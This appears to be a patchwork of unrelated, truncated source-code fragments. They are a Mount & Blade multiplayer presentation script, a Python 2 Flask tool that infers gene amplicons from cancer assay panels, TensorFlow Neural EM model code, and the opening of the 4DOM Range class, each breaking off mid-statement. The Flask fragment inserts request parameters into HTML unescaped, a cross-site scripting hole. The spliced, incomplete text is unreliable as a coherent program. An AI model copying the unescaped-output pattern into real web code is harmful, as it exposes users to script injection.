(str_store_string, s2, "str_s2_s3"),
(assign, ":end_cond", 1000),
(call_script, "script_game_multiplayer_get_game_type_mission_template", "$g_multiplayer_game_type"),
(assign, ":cur_mt", reg0),
(str_store_server_name, s0),
(str_store_string, s3, "str_server_name_s0"),
(str_store_string, s2, "str_s2_s3"),
(try_begin),
(eq, "$g_multiplayer_game_type", multiplayer_game_type_coop_battle),
(str_store_string, s0, "str_multi_game_type_9"),
(else_try),
(eq, "$g_multiplayer_game_type", multiplayer_game_type_coop_siege),
(str_store_string, s0, "str_multi_game_type_10"),
(try_end),
(str_store_string, s3, "str_game_type_s0"),
(str_store_string, s2, "str_s2_s3"),
(store_current_scene, ":cur_scene"),
# (val_sub, ":cur_scene", "scn_multi_scene_1"),
# (val_add, ":cur_scene", "str_multi_scene_1"),
# (str_store_string, s0, ":cur_scene"),
(try_begin),
(is_between, ":cur_scene", multiplayer_scenes_begin, multiplayer_scenes_end),
(store_sub, ":string_id", ":cur_scene", multiplayer_scenes_begin),
(val_add, ":string_id", multiplayer_scene_names_begin),
(str_store_string, s0, ":string_id"),
(else_try),
(call_script, "script_coop_get_scene_name", ":cur_scene"),#if not random map use party name
(try_end),
(str_store_string, s3, "str_map_name_s0"),
(str_store_string, s2, "str_s2_s3"),
(store_mission_timer_a, ":mission_timer"),
(val_add, ":mission_timer", "$server_mission_timer_while_player_joined"),
(assign, reg0, ":mission_timer"),
(store_mul, "$g_multiplayer_game_max_seconds", "$g_multiplayer_game_max_minutes", 60),
(store_sub, ":remaining_seconds", "$g_multiplayer_game_max_seconds", ":mission_timer"),
(store_div, reg0, ":remaining_seconds", 60),
(store_mod, reg1, ":remaining_seconds", 60),
(try_begin),
(ge, reg0, 10),
(ge, reg1, 10),
(str_clear, s0),
(str_clear, s1),
(else_try),
(ge, reg0, 10),
(str_clear, s0),
(str_store_string, s1, "@0"),
(else_try),
(ge, reg1, 10),
(str_store_string, s0, "@0"),
(str_clear, s1),
(else_try),
(str_store_string, s0, "@0"),
(str_store_string, s1, "@0"),
(try_end),
(str_store_string, s3, "str_remaining_time_s0reg0_s1reg1"),
(str_store_string, s2, "str_s2_s3"),
(try_for_range, ":cur_option", 0, ":end_cond"),
(assign, reg0, -12345), #magic number
(call_script, "script_game_get_multiplayer_server_option_for_mission_template", ":cur_mt", ":cur_option"),
(try_begin),
(eq, reg0, -12345),
(assign, ":end_cond", 0),
(else_try),
(call_script, "script_game_multiplayer_server_option_for_mission_template_to_string", ":cur_mt", ":cur_option", reg0),
(str_store_string, s3, s0),
(str_store_string, s2, "str_s2_s3"),
(try_end),
(try_end),
(create_text_overlay, reg0, s2, tf_scrollable),
(overlay_set_color, reg0, 0xFFFFFF),
(position_set_x, pos1, 230),
(position_set_y, pos1, 425),
(overlay_set_position, reg0, pos1),
(position_set_x, pos1, 540),
(position_set_y, pos1, 150),
(overlay_set_area_size, reg0, pos1),
(presentation_set_duration, 999999),
(try_end),
]),
(ti_on_presentation_run,
[
(str_store_welcome_message, s0),
(try_begin),
(neq, "$g_multiplayer_show_server_rules", 1),
(this_or_next|str_is_empty, s0),
(eq, "$g_multiplayer_welcome_message_shown", 1),
(presentation_set_duration, 0),
(neg|is_presentation_active, "prsnt_coop_escape_menu"),
(neg|is_presentation_active, "prsnt_coop_team_select"),
(start_presentation, "prsnt_coop_team_select"),
(else_try),
(store_mission_timer_a, ":mission_timer"),
(gt, ":mission_timer", 1),
(this_or_next|key_clicked, key_escape),
(this_or_next|key_clicked, key_space),
(this_or_next|key_clicked, key_enter),
(this_or_next|key_clicked, key_left_mouse_button),
(key_clicked, key_right_mouse_button),
(assign, "$g_multiplayer_welcome_message_shown", 1),
(presentation_set_duration, 0),
(neg|is_presentation_active, "prsnt_coop_escape_menu"),
(neg|is_presentation_active, "prsnt_coop_team_select"),
(try_begin),
(eq, "$g_multiplayer_show_server_rules", 1),
(assign, "$g_multiplayer_show_server_rules", 0),
(start_presentation, "prsnt_coop_escape_menu"),
(else_try),
(start_presentation, "prsnt_coop_team_select"),
(try_end),
(try_end),
]),
]),
("coop_escape_menu", prsntf_manual_end_only, 0, [
(ti_on_presentation_load,
[(set_fixed_point_multiplier, 1000),
(assign, "$g_presentation_obj_escape_menu_1", -1),
(assign, "$g_presentation_obj_escape_menu_2", -1),
(assign, "$g_presentation_obj_escape_menu_3", -1),
(assign, "$g_presentation_obj_escape_menu_4", -1),
(assign, "$g_presentation_obj_escape_menu_5", -1),
(assign, "$g_presentation_obj_escape_menu_6", -1),
(assign, "$g_presentation_obj_escape_menu_7", -1),
(assign, "$g_presentation_obj_escape_menu_8", -1),
(assign, "$g_presentation_obj_escape_menu_9", -1),
(assign, "$g_presentation_obj_escape_menu_10", -1),
(assign, "$g_presentation_obj_escape_menu_11", -1),
(assign, "$g_presentation_obj_escape_menu_12", -1),
(assign, "$g_presentation_obj_escape_menu_13", | |
from flask import Flask, request
app = Flask(__name__)
@app.route("/evaluate")
def infercnv():
assay = request.args.get('test')
assay = assay.encode('ascii','ignore')
if assay == "FoundationOne":
filename2 = "foundationone.txt"
if assay == "FoundationCdx":
filename2 = "foundation_one_cdx.txt"
if assay == "TempusXT":
filename2 = "tempus-596.txt"
if assay == "Oncomine-v3":
filename2 = "oncomine-v3.txt"
if assay == "Caris-MI":
filename2 = "caris-mi-profile.txt"
if assay == "Trusight170":
filename2 = "trusight_170.txt"
if assay == "Trusight500":
filename2 = "trusight500.txt"
if assay == "STRATA-NGS":
filename2 = "strataNGS.txt"
if assay == "custom":
customlist = request.args.get('custom')
customlist = customlist.encode('ascii', 'ignore')
verboseoutput = ""
verboseoutput = request.args.get('verbose')
#verboseoutput = verboseoutput.encode('ascii', 'ignore')
filename1 = "coordinates.txt"
filename3 = "cosmic.txt"
foundationlist = []
genelist = []
genome = []
counter = 0
cosmiclist = []
if assay != "custom":
with open(filename2) as fh: # imports the list of genes on Foundation One test
while True:
line2 = fh.readline().rstrip() # read the first line
line2 = line2.upper()
if not line2: break
foundationlist.append(line2)
if assay == "custom":
foundationlist = customlist.split("\r\n")
foundationlist = map(str.strip, foundationlist) # removes spaces from elements in list
foundationlist = map(str.upper, foundationlist) # convert all elements of string to upper case
foundationlist = filter(None, foundationlist) # removes blank elements in list resulting from blank lines in form text area
with open(filename3) as fh: # imports the list of genes recurrently altered in cancer from COSMIC
while True:
line3 = fh.readline().rstrip() # read the first line
line3 = line3.upper()
if not line3: break
cosmiclist.append(line3)
with open(filename1) as fh:
while True:
line1 = fh.readline().rstrip() # read the first line
line1 = line1.upper() # changes all text to upper case
counter += 1
if not line1: break
if "Chromosome" not in line1:
chr, start, end, karyotype, gene = line1.split("\t") # splits each line by tabs
genelist.append(gene)
coordinates = chr, start, end, karyotype, gene
coordinates = list(coordinates)
coordinateswithcounter = chr, start, end, karyotype, gene, counter
coordinateswithcounter = list(coordinateswithcounter)
genome.append(coordinateswithcounter)
weboutput = "" #starts assembling a string which will return the results to browser in html format
weboutput += "<h1>InferAMP Results:</h1>"
#weboutput += customlist
candidates = []
query = request.args.get('query') # takes the query argument passed in http query to app (gene names)
query = query.encode('ascii','ignore') # change imported text from unicode to ascii
candidates = list(query.split(","))
candidates = map(str.strip, candidates) # removes spaces from elements in list
candidates = map(str.upper, candidates) # convert all elements of string to upper case
weboutput += str("Assay selected: " + assay + " (" + str(len(foundationlist)) + " genes).<br>")
if len(foundationlist) < 100:
weboutput += "Note: Amplicon boundary refinement is much more accurate in assays panels with high gene numbers."
if verboseoutput == "verbose":
weboutput += "<p> Verbose output selected.<br>"
weboutput += "<p> Assay gene list:<br>"
for s in foundationlist:
weboutput += str(s + "," + " ")
weboutput += "<p>----------------------------------------------------------------------------------------------------------------------------</p>"
if assay == "custom":
custom_errors=[]
for s in foundationlist:
if s not in genelist:
custom_errors.append(s)
if custom_errors != []:
weboutput += "<p> Custom assay gene name entry error check:<br>"
weboutput += str("I didn't find the following gene(s). Are you sure of correct name: " + str(custom_errors) + "<br>")
weboutput += "If it is one of the following, please correct to the standard name:<br>"
weboutput += "C10ORF54 = VSIR <br> C11ORF30 = EMSY <br> C17ORF39 = GID4<br> FAM123B = AMER1<br> FAM175A = ABRAXAS1<br> GPR124 = ADGRA2<br> MLL = KMT2A<br> MLL2 = KMT2D <br> MLL3 = KMT2C<br> MRE11A = MRE11 <br> MYCL1 = MYCL <br> MYST3 = KAT6A <br> PAK5 = PAK7<br> PARK2 = PRKN <br> TCEB1 = ELOC<br> WHSC1 = NSD1<br> WHSC1L1 = NSD3<br>"
weboutput += "Otherwise, please try to find an alternate name <a href=\"https://www.ncbi.nlm.nih.gov/gene\"> HERE</a> <br>"
for a in candidates:
if a not in genelist: # handling cases where entered gene name is not in list - either typo or using non-standard name
weboutput += "*****************************************************************<br>"
weboutput += str("I didn't find the following gene. Are you sure of correct name: " + a + "<br>")
weboutput += "*****************************************************************<br>"
weboutput += "If it is one of the following, please correct to the standard name:<br>"
weboutput += "C10ORF54 = VSIR <br> C11ORF30 = EMSY <br> C17ORF39 = GID4<br> FAM123B = AMER1<br> FAM175A = ABRAXAS1<br> GPR124 = ADGRA2<br> MLL = KMT2A<br> MLL2 = KMT2D <br> MLL3 = KMT2C<br> MRE11A = MRE11 <br> MYCL1 = MYCL <br> MYST3 = KAT6A <br> PAK5 = PAK7<br> PARK2 = PRKN <br> TCEB1 = ELOC<br> WHSC1 = NSD1<br> WHSC1L1 = NSD3<br>"
weboutput += "*****************************************************************<br>"
weboutput += str("<p> You entered the following amplified genes: " + "%s" % ", ".join(map(str, candidates)) + "<br>")
nonamplifiedgenes = list(set(foundationlist) - set(candidates)) # assumes genes not flagged as amplified by Foundation are not amplified. Told this is true by Tech Support
for g in genome: # tag genes with status for FoundationOne reported genes
if g[4] in candidates:
g.append("reported-up")
elif g[4] in nonamplifiedgenes:
g.append("reported-notup")
elif g not in candidates and g not in nonamplifiedgenes:
g.append("not reported")
currentstatus = "Pending"
lastchr = "0"
firsthit = 0
laststatus = ""
lasthit = 0
increment_startpending = 1
for g in genome: # populates g[6] with "Pending"
g.append("unassigned")
for g in genome:
currentchr = g[0]
currentposition = int(g[5])
if g[6] == "reported-up" and firsthit == 0:
currentstatus = "inferAMP"
g[7] = currentstatus
firsthit = 1 # flags the first gene on the chr with a Foundation One report. 1 is for amplified, 2 is for same
increment_firstfound = int(g[5])
increment_lastfound = int(g[5])
lasthit = 1
if g[6] == "reported-notup" and firsthit == 0:
currentstatus = "inferSAME"
g[7] = currentstatus
firsthit = 2 # flags the first gene on the chr with a Foundation One report. 1 is for amplified, 2 is for same
increment_firstfound = int(g[5])
increment_lastfound = int(g[5])
lasthit = 2
if g[
6] == "reported-up" and firsthit > 0: # found amplified gene in an amplicon already containing an amplified gene
currentstatus = "inferAMP"
g[7] = currentstatus
if lasthit == 2:
for a in genome[increment_lastfound:currentposition - 1]:
a[7] = "possibleAMP"
if lasthit == 1:
for a in genome[increment_lastfound:currentposition - 1]:
a[7] = "inferAMP"
increment_lastfound = int(g[5])
lasthit = 1
if g[6] == "reported-notup" and firsthit > 0:
currentstatus = "inferSAME"
g[7] = currentstatus
increment_lastfound = int(g[5])
lasthit = 2
if g[6] == "not reported" and currentchr == lastchr:
if laststatus == "inferAMP":
g[7] = "possibleAMP"
elif laststatus != "inferAMP":
g[7] = laststatus
if currentchr != lastchr: # need to close out variables and fill in information between chr ends and first Foundation One assessment
currentposition = int(g[5])
if firsthit == 1: # fills in fields from start of chr to first reported marker
for a in genome[increment_startpending - 1:increment_firstfound - 1]:
a[7] = "possibleAMP"
if firsthit == 2:
for a in genome[increment_startpending - 1:increment_firstfound - 1]:
a[7] = "possibleSAME"
if lasthit == 1:
for a in genome[increment_lastfound:currentposition - 1]:
a[7] = "possibleAMP"
if lasthit == 2:
for a in genome[increment_lastfound:currentposition - 1]:
a[7] = "possibleSAME"
lasthit = 0
firsthit = 0
increment_startpending = int(g[5])
lastchr = currentchr
laststatus = currentstatus
for q in genome: # converts chromosomal p q arms to lower case
q[3] = str(q[3]).lower()
regions = []
amplicon = []
foundamplicon = 0
for q in genome:
if "AMP" in q[7]:
foundamplicon = 1
amplicon.append(q)
if "AMP" not in q[7] and foundamplicon == 1:
foundamplicon = 0
regions.append(amplicon)
amplicon = []
print "%s amplicons found. " % len(regions)
boundary_gene_list = []
for a in regions:
weboutput += "<p>----------------------------------------------------------------------------------------------------------------------------</p>"
cosmicinamp = []
genesinamp = []
startgene = a[0] # picks the start and end chromosomal ideogram loci for reporting
endgene = a[len(a) - 1]
startlocus = startgene[0] + startgene[3]
endlocus = endgene[0] + endgene[3]
start_non_amp_index = startgene[5]-1 #gets the index of the gene preceding the first predicted amplified gene
end_non_amp_index = endgene[5]+1 #gets the index of the gene following the last predicted amplified gene
for w in a:
genesinamp.append(w[4])
for v in genome: | |
(B, K, H, W, C)
"""
with tf.name_scope('mask_rnn_inputs'):
if not gradient_gamma:
gamma = tf.stop_gradient(gamma)
return rnn_inputs * gamma # implicitly broadcasts over C
def run_inner_rnn(self, masked_deltas, h_old):
with tf.name_scope('reshape_masked_deltas'):
shape = tf.shape(masked_deltas)
batch_size = shape[0]
K = shape[1]
M = np.prod(self._input_shape.as_list())
reshaped_masked_deltas = tf.reshape(masked_deltas, tf.stack([batch_size * K, M]))
preds, h_new = self.cell(reshaped_masked_deltas, h_old)
return tf.reshape(preds, shape=shape), h_new
def compute_em_probabilities(self, predictions, data, epsilon=1e-6):
"""Compute pixelwise probability of predictions (wrt. the data).
:param predictions: (B, K, H, W, C)
:param data: (B, 1, H, W, C)
:return: local loss (B, K, H, W, 1)
"""
with tf.name_scope('em_loss_{}'.format(self.distribution)):
if self.distribution == 'bernoulli':
p = predictions
probs = data * p + (1 - data) * (1 - p)
elif self.distribution == 'gaussian':
mu, sigma = predictions, self.e_sigma
probs = ((1 / tf.sqrt((2 * np.pi * sigma ** 2))) * tf.exp(-(data - mu) ** 2 / (2 * sigma ** 2)))
else:
raise ValueError(
'Unknown distribution_type: "{}"'.format(self.distribution))
# sum loss over channels
probs = tf.reduce_sum(probs, 4, keepdims=True, name='reduce_channels')
if epsilon > 0:
# add epsilon to probs in order to prevent 0 gamma
probs += epsilon
return probs
def e_step(self, preds, targets):
with tf.name_scope('e_step'):
probs = self.compute_em_probabilities(preds, targets)
# compute the new gamma (E-step)
gamma = probs / tf.reduce_sum(probs, 1, keepdims=True)
return gamma
def __call__(self, inputs, state, scope=None):
# unpack
input_data, target_data = inputs
h_old, preds_old, gamma_old = state
# compute difference between prediction and input
deltas = self.delta_predictions(preds_old, input_data)
# mask with gamma
masked_deltas = self.mask_rnn_inputs(deltas, gamma_old, self.gradient_gamma)
# compute new predictions
preds, h_new = self.run_inner_rnn(masked_deltas, h_old)
# compute the new gammas
gamma = self.e_step(preds, target_data)
# pack and return
outputs = (h_new, preds, gamma)
return outputs, outputs
def compute_prior(distribution, pixel_prior):
    """Build the constant pixel prior for the given distribution.

    :param distribution: 'bernoulli' (uses pixel_prior['p']) or
        'gaussian' (uses pixel_prior['mu'])
    :return: prior tensor of shape (1, 1, 1, 1, 1)
    :raises KeyError: for any other distribution name
    """
    key_by_dist = {'bernoulli': 'p', 'gaussian': 'mu'}
    if distribution not in key_by_dist:
        raise KeyError('Unknown distribution: "{}"'.format(distribution))
    return tf.constant(
        pixel_prior[key_by_dist[distribution]], shape=(1, 1, 1, 1, 1), name='prior')
# log bci
def binomial_cross_entropy_loss(y, t):
    """Elementwise binomial cross-entropy between predictions y and targets t."""
    with tf.name_scope('binomial_ce'):
        # clip predictions so both logs stay finite
        y_safe = tf.clip_by_value(y, 1e-6, 1. - 1.e-6)
        return -(t * tf.log(y_safe) + (1. - t) * tf.log(1. - y_safe))
# log gaussian
def gaussian_squared_error_loss(mu, sigma, x):
    """Negative Gaussian log-likelihood of x under N(mu, sigma), up to a constant."""
    sigma_sq = tf.clip_by_value(sigma ** 2, 1e-6, 1e6)
    sigma_safe = tf.clip_by_value(sigma, 1e-6, 1e6)
    return ((mu - x) ** 2) / (2 * sigma_sq) + tf.log(sigma_safe)
# compute KL(p1, p2)
def kl_loss_bernoulli(p1, p2):
    """Elementwise KL(p1 || p2) between Bernoulli distributions."""
    with tf.name_scope('KL_loss'):
        # both ratios are clipped before the log to keep the result finite
        ratio_pos = tf.clip_by_value(p1 / tf.clip_by_value(p2, 1e-6, 1e6), 1e-6, 1e6)
        ratio_neg = tf.clip_by_value((1 - p1) / tf.clip_by_value(1 - p2, 1e-6, 1e6), 1e-6, 1e6)
        return p1 * tf.log(ratio_pos) + (1 - p1) * tf.log(ratio_neg)
# compute KL(p1, p2)
def kl_loss_gaussian(mu1, mu2, sigma1, sigma2):
    """Elementwise KL divergence between N(mu1, sigma1) and N(mu2, sigma2)."""
    log_sigma_ratio = tf.log(tf.clip_by_value(sigma2 / sigma1, 1e-6, 1e6))
    return log_sigma_ratio + (sigma1 ** 2 + (mu1 - mu2) ** 2) / (2 * sigma2 ** 2) - 0.5
def compute_outer_loss(mu, gamma, target, prior, pixel_distribution, inter_weight, gradient_gamma):
    """Compute the total NEM training loss for one unrolled step.

    :param mu: predictions (B, K, H, W, C)
    :param gamma: responsibilities from the E-step
    :param target: data (B, 1, H, W, C)
    :param prior: pixel prior tensor (1, 1, 1, 1, 1)
    :param pixel_distribution: 'bernoulli' or 'gaussian'
    :param inter_weight: scalar weight on the inter-cluster term
    :param gradient_gamma: if False, gradients are blocked through gamma
    :return: (total_loss, intra_loss, inter_loss) scalars
    :raises KeyError: on an unknown pixel_distribution
    """
    with tf.name_scope('outer_loss'):
        if pixel_distribution == 'bernoulli':
            intra_loss = binomial_cross_entropy_loss(mu, target)
            inter_loss = kl_loss_bernoulli(prior, mu)
        elif pixel_distribution == 'gaussian':
            intra_loss = gaussian_squared_error_loss(mu, 1.0, target)
            inter_loss = kl_loss_gaussian(mu, prior, 1.0, 1.0)
        else:
            raise KeyError('Unknown pixel_distribution: "{}"'.format(pixel_distribution))
        # weigh losses by gamma and reduce by taking mean across B and sum across H, W, C, K
        # implemented as sum over all then divide by B
        batch_size = tf.to_float(tf.shape(target)[0])
        # Block gradients through gamma once, instead of duplicating the whole
        # reduction in two branches (the original copies were identical apart
        # from the stop_gradient wrapper — a copy-paste divergence hazard).
        weights = gamma if gradient_gamma else tf.stop_gradient(gamma)
        intra_loss = tf.reduce_sum(intra_loss * weights) / batch_size
        inter_loss = tf.reduce_sum(inter_loss * (1. - weights)) / batch_size
        total_loss = intra_loss + inter_weight * inter_loss
        return total_loss, intra_loss, inter_loss
def compute_loss_upper_bound(pred, target, pixel_distribution):
    """Loss of the best single component (max over K), skipping the E-step.

    :raises KeyError: on an unknown pixel_distribution
    """
    best_pred = tf.reduce_max(pred, axis=1, keepdims=True)
    if pixel_distribution == 'bernoulli':
        pixel_loss = binomial_cross_entropy_loss(best_pred, target)
    elif pixel_distribution == 'gaussian':
        pixel_loss = gaussian_squared_error_loss(best_pred, 1.0, target)
    else:
        raise KeyError('Unknown pixel_distribution: "{}"'.format(pixel_distribution))
    # mean across B, sum across H, W, C, K: sum everything, divide by B
    batch_size = tf.to_float(tf.shape(target)[0])
    return tf.reduce_sum(pixel_loss) / batch_size
def get_loss_step_weights(n_steps, loss_step_weights):
    """Expand a per-step loss weight specification.

    'all'  -> every step weighted 1.0
    'last' -> only the final step weighted 1.0
    list/tuple of length n_steps -> returned unchanged
    Anything else raises KeyError.
    """
    if loss_step_weights == 'all':
        return [1.0 for _ in range(n_steps)]
    if loss_step_weights == 'last':
        weights = [0.0 for _ in range(n_steps)]
        weights[-1] = 1.0
        return weights
    if isinstance(loss_step_weights, (list, tuple)):
        assert len(loss_step_weights) == n_steps, len(loss_step_weights)
        return loss_step_weights
    raise KeyError('Unknown loss_iter_weight type: "{}"'.format(loss_step_weights))
class NEM_Network(ScopedFunction):
    """Neural Expectation Maximization network.

    Builds an input/cell/output sub-network triple from the global config,
    wraps it in a NEMCell and unrolls it for ``n_steps`` iterations,
    accumulating a step-weighted NEM loss plus a reconstruction loss.
    """
    # Hyperparameters supplied through the project's Param mechanism.
    binary = Param()  # selects bernoulli pixels + 'bitflip' noise when true
    k = Param()  # number of mixture components
    n_steps = Param()  # number of NEM iterations to unroll
    inter_weight = Param()  # weight on the inter-cluster loss term
    gradient_gamma = Param()  # whether gradients flow through gamma
    e_sigma = Param()  # fixed sigma for the gaussian E-step likelihood
    pred_init = Param()
    loss_step_weights = Param()  # 'all' | 'last' | explicit per-step list
    noise_prob = Param()  # corruption probability passed to add_noise
    pixel_prior = Param()  # dict with 'p' (bernoulli) or 'mu' (gaussian)
    use_NEM_formulation = Param()
    def __init__(self, env, scope=None, **kwargs):
        """Record the environment's observation shape; sub-networks are
        built lazily in build_graph from the global config."""
        self.obs_shape = env.obs_shape
        self.image_height, self.image_width, self.image_depth = self.obs_shape
        # ap_iou_values = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
        # self.eval_funcs = {"AP_at_point_{}".format(int(10 * v)): AP(v) for v in ap_iou_values}
        # self.eval_funcs["AP"] = AP(ap_iou_values)
        self.eval_funcs = dict()
        self.input_network = None
        self.cell = None
        self.output_network = None
        super(NEM_Network, self).__init__(scope=scope)
    @property
    def inp(self):
        return self._tensors["inp"]
    @property
    def batch_size(self):
        return self._tensors["batch_size"]
    @property
    def is_training(self):
        return self._tensors["is_training"]
    @property
    def float_is_training(self):
        return self._tensors["float_is_training"]
    @property
    def float_do_explore(self):
        return self._tensors["float_do_explore"]
    def _call(self, inp, _, is_training):
        """ScopedFunction entry point; unpacks the (inp, labels, background)
        triple and delegates to build_graph."""
        inp, labels, background = inp
        return self.build_graph(inp, labels, background, is_training)
    def build_graph(self, inp, labels, background, is_training):
        """Construct the unrolled NEM graph.

        Returns a dict with 'tensors', 'recorded_tensors' and 'losses'.
        """
        self._tensors = dict(
            inp=inp,
            annotations=labels[0],
            n_annotations=labels[1],
            is_training=is_training,
            float_is_training=tf.to_float(is_training),
            background=background,
            batch_size=tf.shape(inp)[0]
        )
        # Tile the input to (T+1, B, 1, H, W, C): one copy per unroll step
        # plus one extra serving as the step-t+1 target.
        self.tiled_inp = tf.tile(
            inp[None, :, None, ...],
            [self.n_steps+1, 1, 1, 1, 1, 1], name="inp")
        noise_type = 'bitflip' if self.binary else 'masked_uniform'
        inp_corrupted = add_noise(self.tiled_inp, self.noise_prob, noise_type)
        # Get dimensions
        input_shape = tf.shape(self.tiled_inp)
        assert input_shape.get_shape()[0].value == 6, (
            "Requires 6D input (T, B, K, H, W, C) but {}".format(input_shape.get_shape()[0].value))
        # T = time, B = batch size, K = number of components, the rest are image size...
        H, W, C = (x.value for x in self.tiled_inp.get_shape()[-3:])
        pixel_dist = 'bernoulli' if self.binary else 'gaussian'
        # inner_cell = build_network(
        #     H * W * C,
        #     output_dist=pixel_dist,
        #     input=self.input_network,
        #     recurrent=self.recurrent_network,
        #     output=self.output_network,
        #     use_NEM_formulation=self.use_NEM_formulation)
        # Lazily construct the sub-networks from the global config.
        if self.input_network is None:
            self.input_network = cfg.build_input_network(scope="input_network")
        if self.cell is None:
            self.cell = cfg.build_cell(scope="cell")
        if self.output_network is None:
            self.output_network = cfg.build_output_network(scope="output_network")
        inner_cell = FullCell(self.input_network, self.cell, self.output_network, self.is_training)
        nem_cell = NEMCell(
            inner_cell, input_shape=(H, W, C), distribution=pixel_dist,
            pred_init=self.pred_init, e_sigma=self.e_sigma,
            gradient_gamma=self.gradient_gamma)
        prior = compute_prior(pixel_dist, self.pixel_prior)
        hidden_state = nem_cell.init_state(input_shape[1], self.k, dtype=tf.float32)
        outputs = [hidden_state]
        total_losses, upper_bound_losses, intra_losses, inter_losses = [], [], [], []
        loss_step_weights = get_loss_step_weights(self.n_steps, self.loss_step_weights)
        # Unroll the NEM iterations: corrupted input at step t, clean target
        # at step t+1, losses weighted per step.
        for t, loss_weight in enumerate(loss_step_weights):
            inputs = (inp_corrupted[t], self.tiled_inp[t+1])
            hidden_state, output = nem_cell(inputs, hidden_state)
            theta, pred, gamma = output
            total_loss, intra_loss, inter_loss = compute_outer_loss(
                pred, gamma, self.tiled_inp[t+1], prior, pixel_distribution=pixel_dist,
                inter_weight=self.inter_weight, gradient_gamma=self.gradient_gamma)
            # compute estimated loss upper bound (which doesn't use E-step)
            loss_upper_bound = compute_loss_upper_bound(pred, self.tiled_inp[t+1], pixel_dist)
            total_losses.append(loss_weight * total_loss)
            upper_bound_losses.append(loss_upper_bound)
            intra_losses.append(intra_loss)
            inter_losses.append(inter_loss)
            outputs.append(output)
        thetas, preds, gammas = zip(*outputs)
        self._tensors["thetas"] = tf.stack(thetas)  # (T, 1, B*K, M)
        self._tensors["preds"] = tf.stack(preds)  # (T, B, K, H, W, C)
        self._tensors["gammas"] = tf.stack(gammas)  # (T, B, K, H, W, C)
        # final-step prediction of component 0 serves as the reconstruction
        self._tensors["output"] = self._tensors["preds"][-1, :, 0]
        intra_losses = tf.stack(intra_losses)  # (T,)
        inter_losses = tf.stack(inter_losses)  # (T,)
        upper_bound_losses = tf.stack(upper_bound_losses)  # (T,)
        regularization_loss = tf.stack(total_losses)
        flat_inp = tf.layers.flatten(self._tensors["inp"])
        reconstruction = tf.layers.flatten(self._tensors["output"])
        # binary cross-entropy between input and final reconstruction
        reconstruction_loss = -tf.reduce_sum(
            flat_inp * tf.log(reconstruction + 1e-9) +
            (1.0 - flat_inp) * tf.log(1.0 - reconstruction + 1e-9),
            axis=1, name="reconstruction_loss"
        )
        losses = dict(
            regularization=tf.reduce_mean(regularization_loss),
            reconstruction=tf.reduce_mean(reconstruction_loss)
        )
        self.recorded_tensors = {
            "upper_bound_loss_last": tf.reduce_sum(upper_bound_losses[-1]),
            "intra_loss_last": tf.reduce_sum(intra_losses[-1]),
            "inter_loss_last": tf.reduce_sum(inter_losses[-1]),
        }
        return {
            "tensors": self._tensors,
            "recorded_tensors": self.recorded_tensors,
            "losses": losses,
        }
class NeuralEM_RenderHook(object):
    def __init__(self, N=16):
        """Render hook; N is the number of validation examples to plot."""
        self.N = N
def __call__(self, updater):
fetched = self._fetch(self.N, updater)
self._plot(updater, fetched)
def _fetch(self, N, updater):
feed_dict = updater.data_manager.do_val()
network = updater.network
to_fetch = dict(
gammas=network._tensors["gammas"][:, :self.N],
preds=network._tensors["preds"][:, :self.N],
images=network._tensors["inp"][:self.N]
)
sess = tf.get_default_session()
fetched = sess.run(to_fetch, feed_dict=feed_dict)
return fetched
def _plot(self, updater, fetched):
images = fetched['images']
preds = fetched['preds']
gammas = fetched['gammas']
hard_gammas = np.argmax(gammas, axis=2)
N = images.shape[0]
network = updater.network
_, image_height, image_width, _ = images.shape
for i in range(N):
fig, axes = plt.subplots(2*network.k + 2, network.n_steps+1, figsize=(20, 20))
for t in range(network.n_steps+1):
ax = axes[0, t]
img = images[i]
ax.imshow(img)
if t == 0:
ax.set_title("ground truth")
ax.set_xlabel("t = {}".format(t))
ax = axes[1, t]
img = preds[t, i, 0]
ax.imshow(img)
if t == 0:
ax.set_title("reconstruction")
ax.set_xlabel("t = {}".format(t))
for k in range(network.k):
ax = axes[k+2, t]
img = gammas[t, i, k, :, :, 0]
ax.imshow(img)
if t == 0:
ax.set_title("component {} - soft".format(k))
ax.set_xlabel("t = {}".format(t))
for k in | |
########################################################################
#
# File Name: Range.py
#
# Documentation: http://docs.4suite.com/4DOM/Range.py.html
#
"""
WWW: http://4suite.com/4DOM e-mail: <EMAIL>
Copyright (c) 2000 Fourthought Inc, USA. All Rights Reserved.
See http://4suite.com/COPYRIGHT for license and copyright information
"""
from xml.dom import InvalidStateErr
from xml.dom import InvalidNodeTypeErr
from xml.dom import BadBoundaryPointsErr
from xml.dom import IndexSizeErr
from xml.dom import WrongDocumentErr
from xml.dom import Node
class Range:
    """Implementation of the DOM Level 2 Range interface (4DOM)."""
    # Attributes that must not be set through normal attribute assignment;
    # __setattr__ rejects them and internal code writes self.__dict__ directly.
    readOnly =['startContainer',
               'startOffset',
               'endContainer',
               'endOffset',
               'collapsed',
               'commonAncestorContainer',
               ]
    # Result codes of the internal boundary-point comparison.
    POSITION_EQUAL = 1
    POSITION_LESS_THAN = 2
    POSITION_GREATER_THAN = 3
    # 'how' argument values accepted by compareBoundaryPoints().
    START_TO_START = 0
    START_TO_END = 1
    END_TO_END = 2
    END_TO_START = 3
def __init__(self,ownerDocument):
self._ownerDocument = ownerDocument
self.__dict__['startContainer'] = ownerDocument
self.__dict__['startOffset'] = 0
self.__dict__['endContainer'] = ownerDocument
self.__dict__['endOffset'] = 0
self.__dict__['collapsed'] = 1
self.__dict__['commonAncestorContainer'] = ownerDocument
self.__dict__['detached'] = 0
def __setattr__(self,name,value):
if name in self.readOnly:
raise AttributeError, name
self.__dict__[name] = value
def __getattr__(self,name):
if name in self.readOnly:
#Means we are detached
raise InvalidStateErr()
raise AttributeError, name
    def cloneContents(self):
        """Clone the contents defined by this range.

        Returns a DocumentFragment containing copies of everything between
        the range's boundary points. Four cases are handled: both boundaries
        in the same node; start node is the common ancestor; end node is the
        common ancestor; and the general case where both sides must be cloned
        up to the common ancestor.
        """
        if self.detached:
            raise InvalidStateErr()
        df = self._ownerDocument.createDocumentFragment()
        if self.startContainer == self.endContainer:
            # Case 1: both boundary points in the same node.
            if self.startOffset == self.endOffset:
                return df
            if self.startContainer.nodeType in [Node.TEXT_NODE,
                                                Node.COMMENT_NODE,
                                                Node.PROCESSING_INSTRUCTION_NODE]:
                #Adjust the character data
                data = self.startContainer.substringData(self.startOffset,1+self.endOffset-self.startOffset)
                tx = self._ownerDocument.createTextNode(data)
                df.appendChild(tx)
            else:
                #Clone a set number of children
                numDel = self.endOffset - self.startOffset+1
                for ctr in range(numDel):
